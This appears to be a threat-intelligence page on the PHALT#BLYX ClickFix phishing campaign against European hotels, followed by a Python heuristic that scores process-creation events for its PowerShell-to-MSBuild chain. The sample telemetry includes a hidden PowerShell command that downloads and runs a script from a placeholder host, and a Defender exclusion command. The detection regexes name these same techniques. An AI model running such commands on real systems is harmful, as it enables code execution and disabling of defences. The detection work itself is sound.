PHALT#BLYX ClickFix phishing campaign targets European hospitality with DCRat
Campaign
Summary
PHALT#BLYX is an active ClickFix-style phishing campaign that targets the European hospitality sector and uses Booking.com-themed reservation-cancellation lures to push victims into running malicious PowerShell. The operation matters because fake CAPTCHA pages and bogus BSoD recovery prompts are used to trigger code execution, enabling MSBuild.exe-based payload delivery, Defender tampering, and DCRat installation.
Related Happenings
KongTuke Microsoft Teams initial access campaign
Campaign
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
About this happening:
The **KongTuke** campaign now uses **Microsoft Teams** social engineering to gain persistent access to **corporate networks**, shortening initial compromise to **under five minute...
Silver Fox South Asia phishing campaign
Campaign
First: 24.03.2026 18:00
Last: 24.03.2026 18:00
Sources 1
About this happening:
The **Silver Fox** campaign now includes **BYOVD** abuse of a previously unknown **WatchDog Anti-malware** driver, **amsdk.sys (version 1.0.600)**, to disable security tools on co...
Microsoft Teams Quick Assist A0Backdoor phishing campaign
Campaign
First: 10.03.2026 00:50
Last: 10.03.2026 00:50
Sources 1
About this happening:
The **Microsoft Teams** phishing campaign is tricking employees at **financial and healthcare organizations** into starting **Quick Assist** remote sessions, creating an immediate...
A0Backdoor malware deployed through signed MSI sideloading and DNS MX C2
Malware Activity
First: 10.03.2026 00:50
Last: 10.03.2026 00:50
Sources 1
About this happening:
The **A0Backdoor** malware was deployed on **Windows endpoints** through **digitally signed MSI installers** and **DLL sideloading**, giving the operators a stealthier path to exe...
OpenClaw fake installer GitHub campaign promoted by Bing AI
Campaign
First: 06.03.2026 00:37
Last: 06.03.2026 00:37
Sources 1
About this happening:
A **last month** campaign used **fake OpenClaw installers** on **GitHub** and **Bing AI**-promoted search results to push **malware loaders** and **infostealers** to people trying...
Latest development: 09.03.2026 20:31
A malicious npm package named @openclaw-ai/openclawai, uploaded on March 3, 2026, masquerades as an OpenClaw installer and uses a postinstall hook to launch scripts/setup.js, display a fake CLI and iCloud Keychain prompt, and fetch a second-stage payload from trackpipe[.]dev. The chain installs a persistent RAT internally identified as GhostLoader and steals macOS Keychain data, browser credentials, crypto wallets, SSH keys, Apple Notes, iMessage history, Safari history, and Mail data before exfiltrating a tar.gz archive through the C2 server, Telegram Bot API, and GoFile.io.
Timeline
- 06.01.2026 14:13 · 2 articles
PHALT#BLYX ClickFix phishing campaign targets European hospitality with DCRat
Initial Disclosure: The initial access phase starts with a phishing email impersonating **Booking.com** and warning recipients about an unexpected reservation cancellation. A fake website then presents a bogus **CAPTCHA** and **BSoD** recovery prompt that tries to get the victim to paste and execute a command in Windows Run.
Sources:
- Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat — thehackernews.com — 06.01.2026 14:13
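The summary and the initial-disclosure entry above describe the same execution chain: a command pasted into Windows Run launches PowerShell, which pulls a payload through MSBuild.exe and tampers with Defender before DCRat lands. The following script is an added detection example written for this page; it is not code from The Hacker News, from the campaign, or from any vendor product. It scores constructed process-creation records (fields modelled on Sysmon Event ID 1) against that chain. The scoring rules, weights, threshold, the `lure-placeholder.example` URL and every sample event are this example's own assumptions, chosen to illustrate where a defender would look rather than to reproduce any real telemetry.

```python
"""Heuristic scoring of the ClickFix execution chain described on this page.

Added example, not from the page or any vendor. Field names mirror Sysmon
Event ID 1 (pid, parent pid, image, command line); the rules and weights
are assumptions made for illustration, not a published signature.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record."""
    pid: int
    ppid: int
    image: str
    command_line: str


SHELLS = ("powershell.exe", "pwsh.exe")
# Heuristic patterns (assumptions): hidden/encoded PowerShell, remote fetch
# helpers, and Defender preference cmdlets used for exclusions/disablement.
HIDDEN_OR_ENCODED = re.compile(r"-(?:w|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s", re.I)
REMOTE_FETCH = re.compile(r"\b(?:iwr|Invoke-WebRequest|DownloadString|irm|Invoke-RestMethod)\b", re.I)
DEFENDER_TAMPER = re.compile(r"(?:Set|Add)-MpPreference|DisableRealtimeMonitoring|ExclusionPath", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: ProcEvent, parent):
    """Return (points, reasons) for one event given its parent event or None."""
    points, reasons = 0, []
    name = image_name(event.image)
    pname = image_name(parent.image) if parent else ""
    cmd = event.command_line
    if name in SHELLS and pname == "explorer.exe":
        # The Run dialog (Win+R) is hosted by explorer.exe, so a shell spawned
        # directly from it matches the "paste into Windows Run" step.
        points += 1
        reasons.append("powershell spawned from explorer.exe (Run dialog)")
        if HIDDEN_OR_ENCODED.search(cmd):
            points += 2
            reasons.append("hidden window / encoded command")
        if REMOTE_FETCH.search(cmd):
            points += 2
            reasons.append("downloads remote content")
    if name == "msbuild.exe" and pname in SHELLS:
        points += 3
        reasons.append("MSBuild.exe launched by PowerShell (proxy execution)")
    if DEFENDER_TAMPER.search(cmd):
        points += 3
        reasons.append("Defender configuration tampering cmdlet")
    return points, reasons


def detect_clickfix_chains(events, threshold: int = 6):
    """Group events under their top-level PowerShell started from explorer.exe
    and sum the subtree score. Returns {root_pid: (score, reasons)} for roots
    at or above the threshold (threshold is an assumption; tune on real data)."""
    by_pid = {e.pid: e for e in events}

    def root_of(e):
        cur = e
        while cur is not None:
            parent = by_pid.get(cur.ppid)
            if image_name(cur.image) in SHELLS and parent and image_name(parent.image) == "explorer.exe":
                return cur.pid
            cur = None if (parent is None or parent.pid == cur.pid) else parent
        return None

    totals = defaultdict(lambda: [0, []])
    for e in events:
        root = root_of(e)
        if root is None:
            continue  # not under a Run-dialog shell; ignore
        pts, why = score_event(e, by_pid.get(e.ppid))
        totals[root][0] += pts
        totals[root][1].extend(why)
    return {pid: (s, r) for pid, (s, r) in totals.items() if s >= threshold}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not real events
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    # victim pastes the lure's command into Win+R (URL is a placeholder)
    ProcEvent(200, 100, PS, 'powershell.exe -w hidden -c "iwr https://lure-placeholder.example/s.txt | iex"'),
    ProcEvent(300, 200, PS, "powershell.exe -c Add-MpPreference -ExclusionPath C:\\Users\\Public"),
    ProcEvent(400, 200, MSBUILD, r"MSBuild.exe C:\Users\Public\stage.xml"),
    # benign: an admin opens an interactive shell from the Run dialog
    ProcEvent(500, 100, PS, "powershell.exe"),
    # benign: Visual Studio builds a project
    ProcEvent(700, 100, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(600, 700, MSBUILD, r"MSBuild.exe C:\src\app.csproj"),
]

if __name__ == "__main__":
    for root, (score, reasons) in detect_clickfix_chains(SAMPLE_EVENTS).items():
        print(f"root pid {root}: score {score}")
        for r in reasons:
            print("  -", r)
```

The grouping step is the part worth copying: scoring each process in isolation flags the benign interactive shell from the Run dialog as weakly suspicious, while summing the subtree under the shell that explorer.exe spawned lets the hidden-window launch, the Defender exclusion and the MSBuild child reinforce one another. On real data the same three observations map to event sources you already collect (process creation with parent image and command line), so the heuristic can be re-expressed as a SIEM query without the Python.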